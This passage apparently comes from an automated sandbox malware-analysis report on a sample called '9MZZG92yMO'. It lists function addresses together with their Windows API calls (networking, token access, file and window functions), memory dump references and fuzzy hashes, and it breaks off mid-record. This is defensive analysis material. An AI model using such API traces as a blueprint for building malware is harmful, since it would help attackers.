                                                                                                                      • Opcode Fuzzy Hash: 1c19ee57d403acba0858323f38591a736cc2ffbb6af11325e035ead7f01c6742
                                                                                                                      • Instruction Fuzzy Hash: E911B7395042887FCB00B2B7AC4ADFE7B68AFD2329F14006FF100531C2EE78198653A8
                                                                                                                      Function 00531767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005317A3
                                                                                                                        • Part of subcall function 0053182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0053184C
                                                                                                                        • Part of subcall function 0053182D: InternetCloseHandle.WININET(00000000), ref: 005318E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1463438336-0
                                                                                                                      • Opcode ID: 0c9e1c02ab391e5aafc54ad0596f85c7792f6456682fbce6c36d8287b05d5034
                                                                                                                      • Instruction ID: 67eb8cf21d18a9b064e613e847e363241c04c6e40596b3f9ffb9e75adb4d0b67
                                                                                                                      • Opcode Fuzzy Hash: 0c9e1c02ab391e5aafc54ad0596f85c7792f6456682fbce6c36d8287b05d5034
                                                                                                                      • Instruction Fuzzy Hash: F121F335200A01BFEB129F74DC01FBBBFA9FF89710F14442AFA0596650DB71D811A7A8
                                                                                                                      Function 00523A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNEL32(?,0054FAC0), ref: 00523A64
                                                                                                                      • GetLastError.KERNEL32 ref: 00523A73
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00523A82
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0054FAC0), ref: 00523ADF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2267087916-0
                                                                                                                      • Opcode ID: 36475016b578ab5397588cfe86ecc51261e0652d5e58e79bee81a2d79fc3a8fa
                                                                                                                      • Instruction ID: a26f8213853f60fa8a3930f1edd1241fcfe2897eff2acb48785290060d37a11a
                                                                                                                      • Opcode Fuzzy Hash: 36475016b578ab5397588cfe86ecc51261e0652d5e58e79bee81a2d79fc3a8fa
                                                                                                                      • Instruction Fuzzy Hash: AD21A3785082119F8300DF29D8819AF7BE4BE5A368F144A2EF499C72E1D735DE4ACB42
                                                                                                                      Function 0051DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0051F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0051DCD3,?,?,?,0051EAC6,00000000,000000EF,00000119,?,?), ref: 0051F0CB
                                                                                                                        • Part of subcall function 0051F0BC: lstrcpyW.KERNEL32(00000000,?,?,0051DCD3,?,?,?,0051EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0051F0F1
                                                                                                                        • Part of subcall function 0051F0BC: lstrcmpiW.KERNEL32(00000000,?,0051DCD3,?,?,?,0051EAC6,00000000,000000EF,00000119,?,?), ref: 0051F122
                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0051EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0051DCEC
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,0051EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0051DD12
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0051EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0051DD46
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                      • Opcode ID: 05084513d91e696192e0bdecf3d00046fa0cad71156a1ea56ff35a63c5989ae6
                                                                                                                      • Instruction ID: 68ced251340f938a02d067508e661893b6ce2715b48f288c869077111ea91644
                                                                                                                      • Opcode Fuzzy Hash: 05084513d91e696192e0bdecf3d00046fa0cad71156a1ea56ff35a63c5989ae6
                                                                                                                      • Instruction Fuzzy Hash: 3611D63A100305EBDB159F34EC49DBA7BB9FF45354B40402AF806CB250EB719880D7A5
                                                                                                                      Function 004F50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 004F5101
                                                                                                                        • Part of subcall function 004E571C: __FF_MSGBANNER.LIBCMT ref: 004E5733
                                                                                                                        • Part of subcall function 004E571C: __NMSG_WRITE.LIBCMT ref: 004E573A
                                                                                                                        • Part of subcall function 004E571C: RtlAllocateHeap.NTDLL(01070000,00000000,00000001,00000000,?,?,?,004E0DD3,?), ref: 004E575F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 614378929-0
                                                                                                                      • Opcode ID: dfc2f85840818146ca5ab4fd5341d016bf5043df46e39e270b1bc0da2098bd6b
                                                                                                                      • Instruction ID: 7c1d9ea85e6526f7f86c2b3fd6edca986ff10c30dcb4b3de38abeea27a1e4def
                                                                                                                      • Opcode Fuzzy Hash: dfc2f85840818146ca5ab4fd5341d016bf5043df46e39e270b1bc0da2098bd6b
                                                                                                                      • Instruction Fuzzy Hash: BC11C471D00A19AECF312F76AD05B7E37989B11366F10092FFB49A6251DF3CA8419798
                                                                                                                      Function 00536369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00527896,?,?,00000000), ref: 004C5A2C
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00527896,?,?,00000000,?,?), ref: 004C5A50
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 00536399
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005363A4
                                                                                                                      • _memmove.LIBCMT ref: 005363D1
                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 005363DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1504782959-0
                                                                                                                      • Opcode ID: 8c7c0522e8f1480fe0baf2098ed647d200d712481b868b7648564fbc37221003
                                                                                                                      • Instruction ID: 0991b44f0696fb8ec1d216bcced7be77de75b0f8defbcc6e1ff0078c27825f15
                                                                                                                      • Opcode Fuzzy Hash: 8c7c0522e8f1480fe0baf2098ed647d200d712481b868b7648564fbc37221003
                                                                                                                      • Instruction Fuzzy Hash: FD119379900109AFCB04FFA5DD46DEEBBB8BF49314B10406EF505A7161DB35AE04DB61
                                                                                                                      Function 00518B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00518B61
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00518B73
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00518B89
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00518BA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: a2a6f970187a4430e720daad87867c79c4833f47fa278a3692a9b39111139efb
                                                                                                                      • Instruction ID: 396a039aaa79305bfda3e89db88dc5a79f958c532ab50772a0966ed47d9e77f1
                                                                                                                      • Opcode Fuzzy Hash: a2a6f970187a4430e720daad87867c79c4833f47fa278a3692a9b39111139efb
                                                                                                                      • Instruction Fuzzy Hash: 5A110679901218BFEB11DBA5C885EEDBBB8FB48710F2040A5EA04B7290DA716E51DB94
                                                                                                                      Function 004C1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 004C12D8
                                                                                                                      • GetClientRect.USER32(?,?), ref: 004FB5FB
                                                                                                                      • GetCursorPos.USER32(?), ref: 004FB605
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004FB610
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4127811313-0
                                                                                                                      • Opcode ID: 3dfbb273aeb7c0584fd308165695e22530fd6a01a64870da6d628110d493b255
                                                                                                                      • Instruction ID: 16353e9a8de4701d560929fcdbe0a9a0ab6ea68d6a262684d618622048ba820f
                                                                                                                      • Opcode Fuzzy Hash: 3dfbb273aeb7c0584fd308165695e22530fd6a01a64870da6d628110d493b255
                                                                                                                      • Instruction Fuzzy Hash: F6115B3D500019ABDB00EF98D889EEEB7B8FB06305F40049AF901E3251C734AA559BA9
                                                                                                                      Function 0051D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0051D84D
                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0051D864
                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0051D879
                                                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0051D897
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352324309-0
                                                                                                                      • Opcode ID: 14428f89cdca3965a955381e054cd97e2f3364f0284c6caa26a734e566f5d5cb
                                                                                                                      • Instruction ID: 6ddfc9bffb27802f1da4809923c551e40e9637688a17371a18be85ef32990e92
                                                                                                                      • Opcode Fuzzy Hash: 14428f89cdca3965a955381e054cd97e2f3364f0284c6caa26a734e566f5d5cb
                                                                                                                      • Instruction Fuzzy Hash: 49115E75605304EBF7208F54DC48FD3BBBCFB00B14F108969A916D6050D7B0E689ABB1
                                                                                                                      Function 004F6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                      • Instruction ID: 9a034e5334309b974e8ff62e6ef49d8d6ce818a3b8365febbbbf16542ef3955a
                                                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                      • Instruction Fuzzy Hash: 42014B7244814EBFCF165E84DC01CEE3F62BF28355B59841AFB1898131D63ED9B1AB85
                                                                                                                      Function 0054B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0054B2E4
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0054B2FC
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0054B320
                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054B33B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 357397906-0
                                                                                                                      • Opcode ID: f345ed9dee9a90906183969f95f98221b52fe1b427e83ad2632f99117f2be3c1
                                                                                                                      • Instruction ID: 921ab8b8d4af9673791c0c9fef0ca09807fc7c0d6fbe096281127d86be218804
                                                                                                                      • Opcode Fuzzy Hash: f345ed9dee9a90906183969f95f98221b52fe1b427e83ad2632f99117f2be3c1
                                                                                                                      • Instruction Fuzzy Hash: 681174B9D00209EFDB01CFA9C8849EEBBF9FF19314F108166E914E3220D731AA659F51
                                                                                                                      Function 00526BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00526BE6
                                                                                                                        • Part of subcall function 005276C4: _memset.LIBCMT ref: 005276F9
                                                                                                                      • _memmove.LIBCMT ref: 00526C09
                                                                                                                      • _memset.LIBCMT ref: 00526C16
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00526C26
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48991266-0
                                                                                                                      • Opcode ID: 03cd36328540366a0148c4aa4523150820716af37f54e49880cb005e5a8580eb
                                                                                                                      • Instruction ID: 0925ee491c9cc7b4fc6e513aae60544484a4eb5300e5f6ea78752ebcdf4008f2
                                                                                                                      • Opcode Fuzzy Hash: 03cd36328540366a0148c4aa4523150820716af37f54e49880cb005e5a8580eb
                                                                                                                      • Instruction Fuzzy Hash: 5FF0303A104114ABCF016F96EC89A8ABF29EF46325F048065FE085F266C775A811DBB4
                                                                                                                      Function 004C2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000008), ref: 004C2231
                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 004C223B
                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004C2250
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 004C2258
                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 004FBE83
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 004FBE90
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 004FBEA9
                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 004FBEC2
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 004FBEE2
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 004FBEED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1946975507-0
                                                                                                                      • Opcode ID: f11764d787efb727e2c9df9d973e5f53a0a7bb6b8b20eed338539d3c05b09776
                                                                                                                      • Instruction ID: db558d92d731d3e252fa922a5f782de4d1580a67591c0819bdcfe13984c9d237
                                                                                                                      • Opcode Fuzzy Hash: f11764d787efb727e2c9df9d973e5f53a0a7bb6b8b20eed338539d3c05b09776
                                                                                                                      • Instruction Fuzzy Hash: 40E03036504144EADB215F68EC0D7D93B10EB16336F008366FB69580E187B14584EB11
                                                                                                                      Function 00518712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0051871B
                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,005182E6), ref: 00518722
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005182E6), ref: 0051872F
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,005182E6), ref: 00518736
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3974789173-0
                                                                                                                      • Opcode ID: 718db7aa038579743daef0d7b3b93648eab4d3da605cc298932727e94a34dbdb
                                                                                                                      • Instruction ID: a4252966ee82f808ed99042dfd6e144ef535a9b78704b6ce6e16c10e49185783
                                                                                                                      • Opcode Fuzzy Hash: 718db7aa038579743daef0d7b3b93648eab4d3da605cc298932727e94a34dbdb
                                                                                                                      • Instruction Fuzzy Hash: F3E0863A6152119BEB305FB45D0CBD73BACEF62796F144828B246CA080DA348889D750
                                                                                                                      Function 004C6240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %U
                                                                                                                      • API String ID: 0-398713088
                                                                                                                      • Opcode ID: 89ad9156440b11216bd871cd2cb196bc59503b00613421d0d385a9623bf1b778
                                                                                                                      • Instruction ID: cdf2c4f1169efc215e497721d5720f99fa3e920237e32b4e8bf653c719611ef6
